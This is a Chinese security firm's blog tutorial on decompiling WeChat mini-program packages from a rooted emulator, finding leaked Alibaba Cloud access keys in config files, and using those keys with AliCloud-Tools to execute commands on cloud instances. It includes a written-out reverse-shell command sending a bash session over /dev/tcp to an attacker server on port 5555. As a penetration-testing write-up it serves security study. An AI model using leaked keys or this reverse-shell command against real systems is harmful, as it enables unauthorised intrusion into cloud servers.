大数跨境
0
0

【干货分享】五分钟教你挖掘小程序漏洞

【干货分享】五分钟教你挖掘小程序漏洞 忆享科技
2022-11-29
0


戟星安全实验室


    忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试、代码审计、应急响应、漏洞研究、威胁情报、安全运维、攻防演练等


本文约1252字,阅读约需5分钟。


前言

现在大多小程序反编译教程所使用的都是node.js,操作过程较为麻烦,那有没有简单好用的工具呢?有!



准备工作


一个模拟器,这里用的是夜神模拟器(模拟器开启root权限)。登录微信,打开小程序首页:

然后再打开文件管理器,找到路径:

/ 根目录下的data/data/com.tencent.mm/MicroMsg

在此目录下会有一个md5加密的文件夹。(如果打开微信小程序过多,同时有多个文件夹不容易识别的情况,可以选择把MicroMsg文件夹所有内容删除掉,再去重新打开微信小程序,就会得到唯一一个MD5加密命名的文件夹)



在该文件夹下的appbrand/pkg目录下找到.wxapkg后缀结尾的文件,其中只有几MB大小的为刚刚打开的小程序的文件。(该文件夹中文件过多也可以清空后,再打开小程序方便识别)



通过模拟器的共享文件将其传到物理机上。然后打开我们的工具(wxapkg-convertor)



将小程序的wxapkg文件直接拖入这个图标中,稍等片刻就可以看到目录下多了一个文件夹,此文件夹就是反编译好的小程序。使用VScode打开




正则查找API




挖洞实战


反编译成功后,查找api接口和敏感信息,定眼一看,在配置文件中,发现了AK/SK


先使用行云管家在线工具,输入AK/SK检索区域的主机个数,大概有6台主机(因之前没有截图,只能靠回忆),可以连接成功的只有4台主机,一台公网服务器,三台内网.



最后利用AliCloud-Tools工具反弹shell,阿里云服务器上监听5555端口,同时要确保安全组中的配置规则开放5555端口。


 执行反弹shell,将目标主机的shell反弹到自己的服务器上:

./AliCloud-Tools -a AK -s SK ecs exec -I 实例ID -c "bash -i >& /dev/tcp/服务器IP/5555 0>&1"

 阿里云服务器接收到反弹shell会话




项目地址


wxapkg-convertor:https://github.com/ezshine/wxapkg-convertor

alicloud-tools:https://github.com/iiiusky/alicloud-tools



-END-


往期推荐


忆享科技企业内刊Q1精彩发布
忆享科技成为腾讯云安全服务合作伙伴,携手打造网络安全服务最佳实践
权威认可!忆享科技喜获公安部“安全专用产品销售许可证”
 忆享科技携手创邻科技,强强联合,助力企业数字化转型


点击关注“忆享科技”微信公众号,获取更多精彩资讯!




【声明】内容源于网络
0
0
忆享科技
忆享科技是一家智能信息化解决方案提供商,业务范围涵盖互联网平台设计与构建、IT应用开发维护、软件服务外包(ITO)、微信相关研发、大型数据中心运维管理、智慧城市等,应用于政府、金融、教育、电力医疗、工程等领域。
内容 107
粉丝 0
认证用户
忆享科技 成都忆享科技有限公司 忆享科技是一家智能信息化解决方案提供商,业务范围涵盖互联网平台设计与构建、IT应用开发维护、软件服务外包(ITO)、微信相关研发、大型数据中心运维管理、智慧城市等,应用于政府、金融、教育、电力医疗、工程等领域。
总阅读11
粉丝0
内容107